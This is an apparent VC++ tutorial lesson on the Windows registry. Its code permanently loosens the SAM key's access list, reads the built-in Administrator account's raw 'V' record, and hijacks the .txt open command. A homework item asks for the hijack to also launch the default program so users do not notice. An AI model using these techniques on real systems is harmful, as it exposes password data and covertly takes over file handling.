vc++高級班之註冊表篇[5]---提權打開SAM子鍵

①、普通方式打開 SAM 子鍵:
// Plain open of the SAM\SAM\Domains subkey with no DACL change made first;
// whether it succeeds depends entirely on the rights the calling account
// already holds on that key.
HKEY hSamKey = NULL;
LPCTSTR lpszSubKey = _T("SAM\\SAM\\Domains");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hSamKey);
if (ERROR_SUCCESS == lRet) {
    MessageBox(_T("打開成功!"));
    RegCloseKey(hSamKey);
}
===================================================
②、提升權限:
#include <Aclapi.h>
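/**
 * Grant the local Administrators group KEY_ALL_ACCESS on HKLM\SAM\SAM by
 * appending an inheritable allow-ACE to the key's DACL.
 *
 * The new DACL is written back with SetNamedSecurityInfo and is therefore
 * persistent: nothing here saves or restores the previous DACL, so the SAM
 * hive stays opened up for Administrators until someone reverts it. A caller
 * that only needs temporary access should keep a copy of pOldDacl and write
 * it back once finished.
 *
 * @return TRUE when the DACL was read, extended and written successfully;
 *         FALSE otherwise, with the failing step's Win32 error code made
 *         available through GetLastError().
 */
BOOL EnableRegSAMPriv()
{
    BOOL bRet = TRUE;
    DWORD dwRet = ERROR_SUCCESS;
    PACL pOldDacl = NULL;
    PACL pNewDacl = NULL;
    EXPLICIT_ACCESS eia = {0};
    // Security descriptor that owns pOldDacl; pOldDacl points into it and must
    // not be freed on its own.
    PSECURITY_DESCRIPTOR pSD = NULL;
    // Object name in the form GetNamedSecurityInfo expects for SE_REGISTRY_KEY
    // ("MACHINE\\..." addresses HKEY_LOCAL_MACHINE). Arrays rather than
    // literals because both APIs take a non-const LPTSTR.
    TCHAR samName[] = _T("MACHINE\\SAM\\SAM");
    // NOTE(review): the group is resolved by its English display name; on a
    // localized Windows this name may not resolve, so a well-known SID would be
    // more portable -- confirm before relying on it.
    TCHAR adminGroup[] = _T("Administrators");

    // Read the current DACL of the SAM key.
    dwRet = GetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                 NULL, NULL, &pOldDacl, NULL, &pSD);
    if (dwRet != ERROR_SUCCESS) {
        bRet = FALSE;
        goto cleanup;
    }

    // Build one ACE: Administrators, full control, inherited by subkeys and values.
    BuildExplicitAccessWithName(&eia, adminGroup, KEY_ALL_ACCESS,
                                SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT);

    // Merge the ACE into a new DACL; pNewDacl is allocated by the API on success.
    dwRet = SetEntriesInAcl(1, &eia, pOldDacl, &pNewDacl);
    if (dwRet != ERROR_SUCCESS) {
        bRet = FALSE;
        goto cleanup;
    }

    // Write the extended DACL back to the key (this is the persistent change).
    dwRet = SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                 NULL, NULL, pNewDacl, NULL);
    if (dwRet != ERROR_SUCCESS) {
        bRet = FALSE;
    }

cleanup:
    // LocalFree(NULL) is a documented no-op, so the pointers need no guards.
    // The label avoids the original "__Error_End", which is a reserved identifier.
    LocalFree(pNewDacl);
    LocalFree(pSD);
    if (!bRet) {
        // Surface the failing step's error code to the caller.
        SetLastError(dwRet);
    }
    return bRet;
}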
===================================================
③、讀取數據:
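// Extend the SAM DACL first; its BOOL result is not the authoritative check
// here, because the open below reports on its own whether access was granted.
EnableRegSAMPriv();

HKEY hKey = NULL;
LPCTSTR lpszSubKey = _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4");
// Only a value read follows, so KEY_READ is all this code needs; asking for
// KEY_ALL_ACCESS requests far more than is used.
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_READ, &hKey);
if (lRet == ERROR_SUCCESS) {
    DWORD dwType = 0, dwDataLen = 0;
    // A NULL data pointer makes RegQueryValueEx report the required size only.
    // The original ignored this result and allocated a 1-byte buffer when the
    // value was missing.
    lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, NULL, &dwDataLen);
    if (lRet == ERROR_SUCCESS && dwDataLen > 0) {
        // One extra zero byte so a string-typed value is NUL-terminated even
        // if the stored data is not.
        BYTE *lpData = new BYTE[dwDataLen + 1];
        ZeroMemory(lpData, dwDataLen + 1);
        lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, lpData, &dwDataLen);
        // lpData holds the raw value bytes only while lRet == ERROR_SUCCESS.
        delete [] lpData;
    }
    RegCloseKey(hKey);
}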
===================================================
④、修改註冊表實現文件類型關聯:C:\WINDOWS\notepad.exe %1
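HKEY hKey = NULL;
LPCTSTR lpszSubKey = _T("txtfile\\shell\\open\\command");
// Writing one value needs only KEY_SET_VALUE, not KEY_ALL_ACCESS.
LONG lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpszSubKey, 0, KEY_SET_VALUE, &hKey);
if (lRet == ERROR_SUCCESS) {
    TCHAR szPath[MAX_PATH] = {0};
    DWORD dwLen = GetModuleFileName(NULL, szPath, MAX_PATH);
    // GetModuleFileName returns 0 on failure and MAX_PATH when the path was
    // truncated; in both cases the path must not be registered as a command.
    if (dwLen > 0 && dwLen < MAX_PATH) {
        // Quote the executable path so a directory containing spaces is not
        // split into several tokens when the shell runs the command.
        CString strFile;
        strFile.Format(_T("\"%s\" %%1"), szPath);
        // REG_SZ data must include the terminating NUL, hence GetLength() + 1;
        // reading through LPCTSTR avoids the GetBuffer()/ReleaseBuffer() pair.
        lRet = RegSetValueEx(hKey, NULL, 0, REG_SZ,
                             (const BYTE *)(LPCTSTR)strFile,
                             (strFile.GetLength() + 1) * sizeof(TCHAR));
        // lRet now carries the write result for the surrounding code to inspect.
    }
    RegCloseKey(hKey);
}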
===================================================
※※※ 小作業:
1、修改註冊表實現文件關聯後,不僅能打開本程序,還要打開默認關聯的程序!
參考帖子:http://www.cctry.com/thread-4026-1-1.html